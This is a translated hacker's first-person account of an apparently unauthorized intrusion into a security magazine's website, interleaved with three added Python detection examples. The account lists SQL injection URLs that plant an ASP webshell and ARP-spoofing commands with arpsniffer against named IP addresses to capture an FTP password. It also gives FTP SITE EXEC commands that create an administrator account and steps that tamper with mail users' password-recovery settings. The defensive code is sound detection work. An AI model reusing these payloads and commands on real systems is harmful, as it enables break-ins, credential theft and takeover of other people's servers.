It doesn't matter whether I want to take issue with you, but if you go a bit too far, making money from someone else's manuscript and dressing yourself up in someone else's technology, I have to remind you that your superiority is built on others' contributions.
1. Scanning finds FTP on ..... No common vulnerabilities ..... Decide on ARP spoofing to sniff it.
2. Find the host to sniff:
C:\> ping www.hacker.com.cn
Pinging www.hacker.com.cn [211.157.102.239] with 32 bytes of data:
Scan 211.157.102.1-211.157.102.255 for ports 80 and 1433, locate a site in the default directory, and find an injection vulnerability.
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))
No sa permission found:
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
Obtain the database name ku1:
Come on, find a way to create a shell (thanks here to the "smelly rice" materials). If you don't understand it, read more material online:
http://xx.xx.xx.xx/111.asp?id=3400; create table [dbo].[xiaolu] ([xiaoxue] [char](255));--
http://xx.xx.xx.xx/111.asp?id=3400; DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_LOCAL_MACHINE, role Roots, /, @result output insert into xiaolu (xiaoxue) values (@result);--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1
The figure shows the web path d:xxxx:
http://xx.xx.xx.xx/111.asp?id=3400; use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400; create table cmd (str image);--
http://xx.xx.xx.xx/111.asp?id=3400; insert into cmd (str) values ();--
http://xx.xx.xx.xx/111.asp?id=3400; backup database ku1 to disk = D:xxxxl.asp;--
(For how to use this shell, see the smallest ASP backdoor at http://666w.cn/down/view.asp?Id=754)
Upload ............ the shell and prepare to escalate privileges .......... Look for pcAnywhere and find:
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.xxx.CIF
The password is cracked, and the pcAnywhere connection seems to be of use to me. Everything goes smoothly. The admin password is the same as the pcAnywhere password. :) tracert:
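The injection chain above (role probe, schema enumeration, stacked DDL, xp_regread, backup-to-disk) leaves a recognisable trail in the web server log. The following is an added example, not code from the original post: it runs detection rules for exactly those steps over constructed IIS-style log lines (the client IPs, file path and log format are made up here).

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines for this example (not from the page):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-01-01 10:00:01 10.0.0.5 GET /111.asp id=3400 200
2005-01-01 10:00:07 10.0.0.5 GET /111.asp id=3400+and+1=(SELECT+IS_SRVROLEMEMBER('sysadmin')) 200
2005-01-01 10:00:12 10.0.0.5 GET /111.asp id=3400+and+1=(select+name+from+master.dbo.sysdatabases+where+dbid=7) 500
2005-01-01 10:00:20 10.0.0.5 GET /111.asp id=3400;create+table+[dbo].[xiaolu]([xiaoxue]+[char](255));-- 200
2005-01-01 10:00:31 10.0.0.5 GET /111.asp id=3400;DECLARE+@result+varchar(255)+EXEC+master.dbo.xp_regread+HKEY_LOCAL_MACHINE 200
2005-01-01 10:00:45 10.0.0.5 GET /111.asp id=3400;backup+database+ku1+to+disk='D:\\x\\1.asp';-- 200
2005-01-01 10:01:02 10.0.0.9 GET /111.asp id=3401 200
"""

# One rule per step the page walks through; each regex is applied to the URL-decoded query string.
RULES = [
    ("role-probe",     re.compile(r"is_srvrolemember\s*\(", re.I)),
    ("schema-enum",    re.compile(r"\bsysdatabases\b|\bsysobjects\b|\bsyscolumns\b", re.I)),
    ("stacked-ddl",    re.compile(r";\s*(create|drop|alter)\s+table\b", re.I)),
    ("registry-read",  re.compile(r"\bxp_reg(read|write)\b", re.I)),
    ("backup-to-disk", re.compile(r"\bbackup\s+(database|log)\s+\S+\s+to\s+disk\b", re.I)),
]

def classify_query(query):
    """Names of the rules that match one cs-uri-query value (decoded first, so '+' and %XX don't hide keywords)."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Return (client_ip, uri_stem, matched_rules) for each request that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ", 6)
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        _date, _time, c_ip, _method, stem, query, _status = fields
        matches = classify_query(query)
        if matches:
            hits.append((c_ip, stem, matches))
    return hits

def ips_completing_chain(hits, needed=("role-probe", "stacked-ddl", "backup-to-disk")):
    """Clients that went all the way from privilege probe through DDL to a file write: the chain on this page."""
    seen = {}
    for ip, _stem, matches in hits:
        seen.setdefault(ip, set()).update(matches)
    return sorted(ip for ip, rules in seen.items() if set(needed) <= rules)
```

A single rule hit is worth a look; one client tripping the whole chain within a minute is the incident.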
1 <10 MS <10 MS <10 MS 211.157.102.239
Alas, in this situation ARP spoofing can be carried out against the anti-DDoS service. (For more on ARP spoofing, see bbs.666379cn/dispbbs.asp?BoardID=7&ID=764&page=1)
Use the webshell to upload the required software:
WinPcap.exe, arpsniffer.exe, pv.exe
arpsniffer.exe ------------ 57k, Rongge's sniffing tool for switched environments
pv.exe ---------------- 60k, the command-line program bundled with PrcView (available from huajun), used to kill processes
WinPcap.exe ---------------- 678k, the driver used for sniffing
Install WinPcap.exe by clicking Next through the installer.
Create a hidden virtual directory (look up how to create one yourself) and set its application protection to Low, so that we can use the webshell to run the ARP program. Otherwise, it will be difficult for administrators to find out.
3. Start sniffing:
OK, continue ........ start the SNIFFER ........ Given the current Chinese network structure and the quality of the related technical personnel, this is close to a sure thing. Run:
arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1
211.157.102.254 is the gateway, 211.157.102.239 is the anti-Black IP, c:\111.txt is the log file, and 1 is the NIC ID.
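The sniff works because forged ARP replies make the switch segment route the gateway's and the target's traffic through a third host. As an added example (not from the original post), the following passive check flags that takeover from ARP observations: it uses the gateway and target addresses named above, while the MAC addresses and the third host's IP are constructed for the example.

```python
from collections import defaultdict

GATEWAY_IP = "211.157.102.254"  # the gateway named on the page
TARGET_IP = "211.157.102.239"   # the host whose FTP session was sniffed on the page

# Constructed ARP observations (sender IP, sender MAC) as a passive listener on the segment
# would record them. The MAC addresses and the third host's IP are made up for this example.
OBSERVED = [
    ("211.157.102.254", "00:11:22:33:44:01"),  # genuine gateway reply
    ("211.157.102.239", "00:11:22:33:44:02"),  # genuine target reply
    ("211.157.102.17",  "00:11:22:33:44:99"),  # the sniffing host's own address
    ("211.157.102.254", "00:11:22:33:44:99"),  # same MAC now claims the gateway IP
    ("211.157.102.239", "00:11:22:33:44:99"),  # ... and the target IP
]

def build_baseline(observations, trusted_count=2):
    """Trust the first `trusted_count` mappings (in production: a static table or first-boot capture)."""
    return {ip: mac for ip, mac in observations[:trusted_count]}

def detect_spoofing(observations, baseline, protected=(GATEWAY_IP, TARGET_IP)):
    """Alert when a baselined IP shows up with a new MAC, or one MAC claims a protected IP plus others."""
    alerts = []
    ips_by_mac = defaultdict(set)
    for ip, mac in observations:
        ips_by_mac[mac].add(ip)
        if ip in baseline and baseline[ip] != mac:
            alerts.append(("ip-mac-changed", ip, baseline[ip], mac))
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1 and ips & set(protected):
            alerts.append(("mac-claims-multiple-ips", mac, sorted(ips)))
    return alerts

def suspect_macs(alerts):
    """MACs that took over a baselined IP: the man in the middle."""
    return sorted({a[3] for a in alerts if a[0] == "ip-mac-changed"})

def static_arp_commands(baseline):
    """Windows `arp -s` lines that pin the baseline so a forged reply cannot overwrite the cache entry."""
    return [f"arp -s {ip} {mac.replace(':', '-')}" for ip, mac in baseline.items()]
```

Static ARP entries on the FTP server and the gateway, plus encrypted transfer instead of plaintext FTP, are what remove this sniffing path.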
What next? Wait, of course ....... but we don't want to wait for days; we hope to do better. Tell your friends to take action and help me: help me tell the editor that his website has been hacked .........
Needless to say, I got the FTP password a few minutes later. Because the arpsniffer process was running and we couldn't see it directly, we ran this through the webshell:
pv -k -f arpsniffer.exe
Kill the process and check the password ~~~~~~
4. Getting to work:
Upload the shell! The disks aren't locked down; you can browse all of them. The target disk is e:\snapshot. Continue with fpipe -v -l 3041 -r 43958 127.0.0.1.
Add an FTP user, set it as an administrator, log on, and run:
Quote site exec net1king xiaolu xiaoxue/add
Quote site exec net1king localgroup administrators xiaolu/add
3389 login, ah, no, continue
Quote site exec net1king xiaolu xiaoxue @@! #! @#@!! ##@ 123/add
Quote site exec net1king localgroup administrators xiaolu/add
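The commands above rely on the FTP server executing OS commands through SITE EXEC, reached over a locally forwarded port. As an added example (not from the original post), this parses a constructed FTP command log in a made-up "time ip user command" format and rates every SITE EXEC, treating account changes and loopback clients as critical.

```python
import re

# Constructed FTP command log for this example (not the page's, and not a specific server's format):
# time client-ip user "command"
FTP_LOG = """\
10:12:01 127.0.0.1 xiaolu "USER xiaolu"
10:12:01 127.0.0.1 xiaolu "PASS ****"
10:12:05 127.0.0.1 xiaolu "SITE EXEC net1 user xiaolu xiaoxue /add"
10:12:09 127.0.0.1 xiaolu "SITE EXEC net1 localgroup administrators xiaolu /add"
10:15:30 10.0.0.7 bob "RETR report.doc"
10:16:02 10.0.0.7 bob "SITE CHMOD 644 report.doc"
"""

LINE_RX = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')
# net / net1 with the user or localgroup verb: the account-manipulation pattern on the page
ACCOUNT_RX = re.compile(r"\bnet1?\s+(user|localgroup)\b", re.I)

def parse_ftp_log(text):
    """Return (time, client_ip, user, command) tuples; lines that don't fit the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if m:
            entries.append(m.groups())
    return entries

def flag_site_exec(entries):
    """Every SITE EXEC is the server running an OS command for the client; account changes and
    commands arriving over loopback (a forwarded port, as with fpipe above) are rated critical."""
    findings = []
    for when, ip, user, cmd in entries:
        if not cmd.upper().startswith("SITE EXEC"):
            continue
        severity = "high"
        if ACCOUNT_RX.search(cmd) or ip.startswith("127."):
            severity = "critical"
        findings.append((when, ip, user, severity, cmd))
    return findings

def users_created_via_ftp(findings):
    """Account names passed to `net user <name> ... /add` inside SITE EXEC commands."""
    rx = re.compile(r"\bnet1?\s+user\s+(\S+)\s+.*?/add\b", re.I)
    names = []
    for _, _, _, _, cmd in findings:
        m = rx.search(cmd)
        if m:
            names.append(m.group(1))
    return names
```

Disabling SITE EXEC, binding the administration port to a non-loopback-reachable interface, and running the FTP service as a low-privilege account each break a different link of this chain.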
Haha, the password restrictions are satisfied too, and I'm in. I won't go into what comes next; it will give the anti-DDoS editor a headache ........ (N content omitted here)
Let's take a look for some good things and find that there is a WebEasyMail server. Read the mail and look at the documents that put the editors in a better position. I don't know what the password looks like.
Hey, come with me: D:\mail\. Each user directory has a UserWeb.ini
Open it and modify:
QuestionInfo = 1
AnswerInfo = 1
HintInfo = 1
Hit Logging
It's time to retreat and leave the rest to the editors.
5. Summary:
This intrusion took about an hour. There was no advanced technique, only simple ones: sniffing-based penetration is a technique from several years ago, and SQL injection is a popular method; none of it is new. It's thanks to friends' "social engineering" that the FTP password was obtained so quickly.
Although the technology itself is valuable, using it flexibly makes it more valuable.